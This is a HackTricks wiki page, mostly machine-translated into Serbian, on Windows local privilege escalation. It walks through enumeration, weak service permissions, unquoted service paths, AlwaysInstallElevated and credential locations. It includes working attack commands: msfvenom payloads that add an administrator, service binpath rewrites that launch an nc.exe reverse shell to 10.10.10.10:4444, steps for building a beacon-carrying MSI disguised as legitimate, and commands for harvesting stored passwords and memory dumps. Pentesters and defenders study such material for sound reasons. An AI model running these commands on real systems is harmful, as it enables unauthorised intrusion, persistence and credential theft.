| .. | ||
| dll-hijacking | ||
| privilege-escalation-abusing-tokens | ||
| access-tokens.md | ||
| acls-dacls-sacls-aces.md | ||
| appenddata-addsubdirectory-permission-over-service-registry.md | ||
| com-hijacking.md | ||
| create-msi-with-wix.md | ||
| dll-hijacking.md | ||
| dpapi-extracting-passwords.md | ||
| from-high-integrity-to-system-with-name-pipes.md | ||
| integrity-levels.md | ||
| juicypotato.md | ||
| leaked-handle-exploitation.md | ||
| msi-wrapper.md | ||
| named-pipe-client-impersonation.md | ||
| privilege-escalation-abusing-tokens.md | ||
| privilege-escalation-with-autorun-binaries.md | ||
| README.md | ||
| roguepotato-and-printspoofer.md | ||
| sedebug-+-seimpersonate-copy-token.md | ||
| seimpersonate-from-high-to-system.md | ||
| windows-c-payloads.md | ||
Windows Local Privilege Escalation
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Najbolji alat za pronalaženje vektora lokalne eskalacije privilegija na Windows-u: WinPEAS
Početna teorija o Windows-u
Pristupni tokeni
Ako ne znate šta su Windows pristupni tokeni, pročitajte sledeću stranicu pre nego što nastavite:
{% content-ref url="access-tokens.md" %} access-tokens.md {% endcontent-ref %}
ACL-ovi - DACL-ovi/SACL-ovi/ACE-ovi
Proverite sledeću stranicu za više informacija o ACL-ovima - DACL-ovima/SACL-ovima/ACE-ovima:
{% content-ref url="acls-dacls-sacls-aces.md" %} acls-dacls-sacls-aces.md {% endcontent-ref %}
Nivoi integriteta
Ako ne znate šta su nivoi integriteta u Windows-u, trebali biste pročitati sledeću stranicu pre nego što nastavite:
{% content-ref url="integrity-levels.md" %} integrity-levels.md {% endcontent-ref %}
Kontrole bezbednosti Windows-a
Postoje različite stvari u Windows-u koje bi mogle sprečiti vas da enumerišete sistem, pokrenete izvršne datoteke ili čak otkriju vaše aktivnosti. Trebalo bi da pročitate sledeću stranicu i enumerišete sve ove mehanizme odbrane pre nego što započnete enumeraciju eskalacije privilegija:
{% content-ref url="../authentication-credentials-uac-and-efs/" %} authentication-credentials-uac-and-efs {% endcontent-ref %}
Informacije o sistemu
Enumeracija informacija o verziji
Proverite da li verzija Windows-a ima neku poznatu ranjivost (proverite i primenjene zakrpe).
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
Verzija Eksploatacije
Ova stranica je korisna za pretraživanje detaljnih informacija o Microsoft bezbednosnim ranjivostima. Ova baza podataka ima više od 4,700 bezbednosnih ranjivosti, pokazujući ogromnu površinu napada koju Windows okruženje predstavlja.
Na sistemu
- post/windows/gather/enum_patches
- post/multi/recon/local_exploit_suggester
- watson
- winpeas (Winpeas ima ugrađen watson)
Lokalno sa informacijama o sistemu
Github repozitorijumi eksploatacija:
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/abatchy17/WindowsExploits
- https://github.com/SecWiki/windows-kernel-exploits
Okruženje
Da li su sačuvane bilo kakve kredencijale/sočne informacije u varijablama okruženja?
set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize
Istorija PowerShell-a
ConsoleHost_history #Find the PATH where is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
PowerShell Transcript datoteke
Možete naučiti kako da to uključite na https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/
#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts
#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript
PowerShell Module Logging
Detalji o izvršenju PowerShell pipeline-a se beleže, obuhvatajući izvršene komande, pozive komandi i delove skripti. Međutim, potpuni detalji izvršenja i rezultati izlaza možda neće biti zabeleženi.
Da biste to omogućili, pratite uputstva u odeljku "Transcript files" dokumentacije, birajući "Module Logging" umesto "Powershell Transcription".
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
Da biste pregledali poslednjih 15 događaja iz PowersShell logova, možete izvršiti:
Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
PowerShell Script Block Logging
Potpuni zapis aktivnosti i sadržaja izvršenja skripte se beleži, osiguravajući da je svaki blok koda dokumentovan dok se izvršava. Ovaj proces čuva sveobuhvatan revizijski trag svake aktivnosti, što je dragoceno za forenziku i analizu zlonamernog ponašanja. Dokumentovanjem svih aktivnosti u trenutku izvršenja, pružaju se detaljni uvidi u proces.
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
Logovanje događaja za Script Block može se pronaći unutar Windows Event Viewer na putanji: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
Da biste pregledali poslednjih 20 događaja, možete koristiti:
Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
Internet Podešavanja
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Дискови
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
WSUS
Možete kompromitovati sistem ako se ažuriranja ne traže koristeći httpS već http.
Počnite tako što ćete proveriti da li mreža koristi WSUS ažuriranje bez SSL-a pokretanjem sledeće komande:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
Ако добијете одговор као што је:
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535
And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer is equals to 1.
Then, it is exploitable. If the last registry is equals to 0, then, the WSUS entry will be ignored.
In orther to exploit this vulnerabilities you can use tools like: Wsuxploit, pyWSUS - These are MiTM weaponized exploits scripts to inject 'fake' updates into non-SSL WSUS traffic.
Read the research here:
{% file src="../../.gitbook/assets/CTX_WSUSpect_White_Paper (1).pdf" %}
WSUS CVE-2020-1013
Read the complete report here.
Basically, this is the flaw that this bug exploits:
If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.
Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.
You can exploit this vulnerability using the tool WSUSpicious (once it's liberated).
KrbRelayUp
A local privilege escalation vulnerability exists in Windows domain environments under specific conditions. These conditions include environments where LDAP potpisivanje nije primenjeno, users possess self-rights allowing them to configure Resource-Based Constrained Delegation (RBCD), and the capability for users to create computers within the domain. It is important to note that these zahtevi are met using podrazumevane postavke.
Find the exploit in https://github.com/Dec0ne/KrbRelayUp
For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/
AlwaysInstallElevated
If these 2 registers are enabled (value is 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Metasploit payloads
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
Ako imate meterpreter sesiju, možete automatizovati ovu tehniku koristeći modul exploit/windows/local/always_install_elevated
PowerUP
Koristite komandu Write-UserAddMSI iz power-up da kreirate unutar trenutnog direktorijuma Windows MSI binarni fajl za eskalaciju privilegija. Ovaj skript piše unapred kompajlirani MSI instalater koji traži dodatak korisnika/grupe (tako da će vam biti potrebna GIU pristup):
Write-UserAddMSI
Just execute the created binary to escalate privileges.
MSI Wrapper
Pročitajte ovaj tutorijal da biste naučili kako da kreirate MSI omotač koristeći ove alate. Imajte na umu da možete omotati ".bat" datoteku ako samo želite da izvršite komandne linije.
{% content-ref url="msi-wrapper.md" %} msi-wrapper.md {% endcontent-ref %}
Create MSI with WIX
{% content-ref url="create-msi-with-wix.md" %} create-msi-with-wix.md {% endcontent-ref %}
Create MSI with Visual Studio
- Generišite sa Cobalt Strike ili Metasploit novi Windows EXE TCP payload u
C:\privesc\beacon.exe - Otvorite Visual Studio, izaberite Kreiraj novi projekat i upišite "installer" u pretraživač. Izaberite projekat Setup Wizard i kliknite Next.
- Dajte projektu ime, kao što je AlwaysPrivesc, koristite
C:\privescza lokaciju, izaberite postavi rešenje i projekat u istom direktorijumu, i kliknite Kreiraj. - Nastavite da klikćete Next dok ne dođete do koraka 3 od 4 (izaberite datoteke za uključivanje). Kliknite Add i izaberite Beacon payload koji ste upravo generisali. Zatim kliknite Finish.
- Istaknite projekat AlwaysPrivesc u Solution Explorer i u Properties, promenite TargetPlatform sa x86 na x64.
- Postoje i druge osobine koje možete promeniti, kao što su Autor i Proizvođač koje mogu učiniti instaliranu aplikaciju izgledom legitimnije.
- Desni klik na projekat i izaberite View > Custom Actions.
- Desni klik na Install i izaberite Add Custom Action.
- Dvaput kliknite na Application Folder, izaberite vašu beacon.exe datoteku i kliknite OK. Ovo će osigurati da se beacon payload izvrši čim se instalater pokrene.
- U Custom Action Properties, promenite Run64Bit na True.
- Na kraju, izgradite.
- Ako se prikaže upozorenje
File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86', uverite se da ste postavili platformu na x64.
MSI Installation
Da biste izvršili instalaciju zlonamerne .msi datoteke u pozadini:
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
Da biste iskoristili ovu ranjivost, možete koristiti: exploit/windows/local/always_install_elevated
Antivirus i detektori
Podešavanja revizije
Ova podešavanja odlučuju šta se beleži, pa treba obratiti pažnju
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
WEF
Windows Event Forwarding, zanimljivo je znati gde se šalju logovi
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
LAPS
LAPS je dizajniran za upravljanje lokalnim administrator lozinkama, osiguravajući da je svaka lozinka jedinstvena, nasumična i redovno ažurirana na računarima koji su pridruženi domeni. Ove lozinke se sigurno čuvaju unutar Active Directory-a i mogu im pristupiti samo korisnici kojima su dodeljene dovoljne dozvole putem ACL-a, omogućavajući im da vide lokalne admin lozinke ako su ovlašćeni.
{% content-ref url="../active-directory-methodology/laps.md" %} laps.md {% endcontent-ref %}
WDigest
Ako je aktivan, lozinke u običnom tekstu se čuvaju u LSASS (Local Security Authority Subsystem Service).
Više informacija o WDigest na ovoj stranici.
reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential
LSA Zaštita
Počevši od Windows 8.1, Microsoft je uveo poboljšanu zaštitu za Lokalnu sigurnosnu vlast (LSA) kako bi blokirao pokušaje nepouzdanih procesa da pročitaju njenu memoriju ili injektuju kod, dodatno osiguravajući sistem.
Više informacija o LSA zaštiti ovde.
reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
Credentials Guard
Credential Guard je uveden u Windows 10. Njegova svrha je da zaštiti kredencijale pohranjene na uređaju od pretnji poput napada pass-the-hash.| Više informacija o Credentials Guard ovde.
reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags
Cached Credentials
Domen credentials se autentifikuju od strane Lokalne bezbednosne vlasti (LSA) i koriste ih komponente operativnog sistema. Kada se podaci o prijavljivanju korisnika autentifikuju od strane registrovanog bezbednosnog paketa, domen credentials za korisnika se obično uspostavljaju.
Više informacija o Cached Credentials ovde.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
Korisnici i Grupe
Nabrajanje Korisnika i Grupa
Trebalo bi da proverite da li neka od grupa kojima pripadate ima zanimljive dozvole.
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Privileged groups
Ako pripadate nekoj privilegovanoj grupi, možda ćete moći da eskalirate privilegije. Saznajte više o privilegovanim grupama i kako ih zloupotrebiti za eskalaciju privilegija ovde:
{% content-ref url="../active-directory-methodology/privileged-groups-and-token-privileges.md" %} privileged-groups-and-token-privileges.md {% endcontent-ref %}
Token manipulation
Saznajte više o tome šta je token na ovoj stranici: Windows Tokens.
Pogledajte sledeću stranicu da saznate o zanimljivim tokenima i kako ih zloupotrebiti:
{% content-ref url="privilege-escalation-abusing-tokens.md" %} privilege-escalation-abusing-tokens.md {% endcontent-ref %}
Logged users / Sessions
qwinsta
klist sessions
Kućni folderi
dir C:\Users
Get-ChildItem C:\Users
Politika lozinki
net accounts
Preuzmite sadržaj clipboard-a
powershell -command "Get-Clipboard"
Pokretanje Procesa
Dozvole za Datoteke i Foldere
Prvo, lista procesa proverava lozinke unutar komandne linije procesa.
Proverite da li možete prepisati neki izvršni fajl koji se pokreće ili da li imate dozvole za pisanje u folderu izvršnog fajla kako biste iskoristili moguće DLL Hijacking napade:
Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes
#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
Uvek proveravajte moguće electron/cef/chromium debuggers koji rade, mogli biste to iskoristiti za eskalaciju privilegija.
Proveravanje dozvola binarnih datoteka procesa
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)
Proveravanje dozvola foldera binarnih procesa (DLL Hijacking)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)
Memory Password mining
Možete napraviti memorijski dump pokrenutog procesa koristeći procdump iz sysinternals. Usluge poput FTP-a imaju akreditive u čistom tekstu u memoriji, pokušajte da dump-ujete memoriju i pročitate akreditive.
procdump.exe -accepteula -ma <proc_name_tasklist>
Insecure GUI apps
Aplikacije koje rade kao SYSTEM mogu omogućiti korisniku da pokrene CMD ili pretražuje direktorijume.
Primer: "Windows Help and Support" (Windows + F1), pretražiti "command prompt", kliknuti na "Click to open Command Prompt"
Services
Dobijte listu servisa:
net start
wmic service list brief
sc query
Get-Service
Dozvole
Možete koristiti sc za dobijanje informacija o servisu
sc qc <service_name>
Preporučuje se da imate binarni accesschk iz Sysinternals da proverite potrebni nivo privilegija za svaku uslugu.
accesschk.exe -ucqv <Service_Name> #Check rights for different groups
Preporučuje se da se proveri da li "Autentifikovani korisnici" mogu da modifikuju bilo koju uslugu:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
Možete preuzeti accesschk.exe za XP ovde
Omogućite servis
Ako imate ovu grešku (na primer sa SSDPSRV):
System error 1058 has occurred.
Usledila je greška servisa 1058. Servis ne može biti pokrenut, ili zato što je on onemogućen ili zato što nema povezanih aktivnih uređaja.
Možete ga omogućiti koristeći
sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""
Imajte na umu da usluga upnphost zavisi od SSDPSRV da bi radila (za XP SP1)
Druga alternativa ovog problema je pokretanje:
sc.exe config usosvc start= auto
Izmena putanje izvršne datoteke servisa
U scenariju gde grupa "Autentifikovani korisnici" poseduje SERVICE_ALL_ACCESS na servisu, izmena izvršne datoteke servisa je moguća. Da biste izmenili i izvršili sc:
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
Ponovno pokreni uslugu
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
Privileges can be escalated through various permissions:
- SERVICE_CHANGE_CONFIG: Omogućava rekonfiguraciju binarne datoteke servisa.
- WRITE_DAC: Omogućava rekonfiguraciju dozvola, što dovodi do mogućnosti promene konfiguracija servisa.
- WRITE_OWNER: Dozvoljava sticanje vlasništva i rekonfiguraciju dozvola.
- GENERIC_WRITE: Nasleđuje sposobnost promene konfiguracija servisa.
- GENERIC_ALL: Takođe nasleđuje sposobnost promene konfiguracija servisa.
For the detection and exploitation of this vulnerability, the exploit/windows/local/service_permissions can be utilized.
Services binaries weak permissions
Check if you can modify the binary that is executed by a service or if you have write permissions on the folder where the binary is located (DLL Hijacking).
You can get every binary that is executed by a service using wmic (not in system32) and check your permissions using icacls:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
Možete takođe koristiti sc i icacls:
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
Services registry modify permissions
Trebalo bi da proverite da li možete da modifikujete bilo koju registraciju servisa.
Možete proveriti svoje dozvole nad registracijom servisa tako što ćete:
reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
Treba proveriti da li Authenticated Users ili NT AUTHORITY\INTERACTIVE poseduju FullControl dozvole. Ako je to slučaj, binarni fajl koji izvršava servis može biti izmenjen.
Da biste promenili putanju binarnog fajla koji se izvršava:
reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
Dozvole AppendData/AddSubdirectory u registru servisa
Ako imate ovu dozvolu nad registrima, to znači da možete kreirati podregistre iz ovog. U slučaju Windows servisa, to je dovoljno za izvršavanje proizvoljnog koda:
{% content-ref url="appenddata-addsubdirectory-permission-over-service-registry.md" %} appenddata-addsubdirectory-permission-over-service-registry.md {% endcontent-ref %}
Nequoted putanje servisa
Ako putanja do izvršne datoteke nije unutar navodnika, Windows će pokušati da izvrši svaku završnicu pre razmaka.
Na primer, za putanju C:\Program Files\Some Folder\Service.exe Windows će pokušati da izvrši:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
Listajte sve necitirane putanje servisa, isključujući one koje pripadaju ugrađenim Windows servisima:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """ #Not only auto services
#Other way
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Možete otkriti i iskoristiti ovu ranjivost sa metasploit-om: exploit/windows/local/trusted\_service\_path Možete ručno kreirati servisni binarni fajl sa metasploit-om:
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
Recovery Actions
Windows omogućava korisnicima da odrede akcije koje će se preduzeti ako usluga ne uspe. Ova funkcija se može konfigurisati da upućuje na binarni fajl. Ako je ovaj binarni fajl zamenljiv, eskalacija privilegija može biti moguća. Više detalja možete pronaći u službenoj dokumentaciji.
Applications
Installed Applications
Proverite dozvole binarnih fajlova (možda možete da prepišete jedan i eskalirate privilegije) i foldera (DLL Hijacking).
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Write Permissions
Proverite da li možete da modifikujete neki konfiguracioni fajl da biste pročitali neki poseban fajl ili ako možete da modifikujete neki binarni fajl koji će biti izvršen od strane Administratorskog naloga (schedtasks).
Jedan od načina da pronađete slabe dozvole za foldere/fajlove u sistemu je da uradite:
accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
Pokreni pri pokretanju
Proverite da li možete da prepišete neki registar ili binarni fajl koji će biti izvršen od strane drugog korisnika.
Pročitajte sledeću stranicu da biste saznali više o zanimljivim mestima za autorun za eskalaciju privilegija:
{% content-ref url="privilege-escalation-with-autorun-binaries.md" %} privilege-escalation-with-autorun-binaries.md {% endcontent-ref %}
Drajveri
Pogledajte moguće čudne/ranjive drajvere trećih strana
driverquery
driverquery.exe /fo table
driverquery /SI
PATH DLL Hijacking
Ako imate dozvole za pisanje unutar fascikle koja se nalazi na PATH-u mogli biste biti u mogućnosti da preuzmete DLL koji učitava proces i povećate privilegije.
Proverite dozvole svih fascikli unutar PATH-a:
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
Za više informacija o tome kako zloupotrebiti ovu proveru:
{% content-ref url="dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md" %} writable-sys-path-+dll-hijacking-privesc.md {% endcontent-ref %}
Mreža
Deljenja
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
hosts file
Proverite za druge poznate računare koji su hardkodirani u hosts datoteci
type C:\Windows\System32\drivers\etc\hosts
Mrežne Interfejsi & DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Open Ports
Proverite ograničene usluge sa spoljne strane
netstat -ano #Opened ports?
Routing Table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP tabela
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
Firewall pravila
Pogledajte ovu stranicu za komande vezane za Firewall (lista pravila, kreiranje pravila, isključivanje, isključivanje...)
Više komandi za mrežnu enumeraciju ovde
Windows podsystem za Linux (wsl)
C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe
Binary bash.exe se takođe može naći u C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
Ako dobijete root korisnika, možete slušati na bilo kojem portu (prvi put kada koristite nc.exe da slušate na portu, pitaće vas putem GUI-a da li nc treba da bude dozvoljen od strane vatrozida).
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
Da biste lako pokrenuli bash kao root, možete pokušati --default-user root
Možete istražiti WSL datotečni sistem u fascikli C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
Windows kredencijali
Winlogon kredencijali
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
Menadžer kredencijala / Windows trezor
Sa https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
Windows trezor čuva korisničke kredencijale za servere, veb sajtove i druge programe za koje Windows može automatski da prijavi korisnike. Na prvi pogled, ovo može izgledati kao da korisnici mogu da čuvaju svoje Facebook kredencijale, Twitter kredencijale, Gmail kredencijale itd., tako da se automatski prijavljuju putem pregledača. Ali to nije tako.
Windows trezor čuva kredencijale koje Windows može automatski da prijavi korisnicima, što znači da svaka Windows aplikacija koja treba kredencijale za pristup resursu (serveru ili veb sajtu) može koristiti ovaj Menadžer kredencijala i Windows trezor i koristiti dostavljene kredencijale umesto da korisnici stalno unose korisničko ime i lozinku.
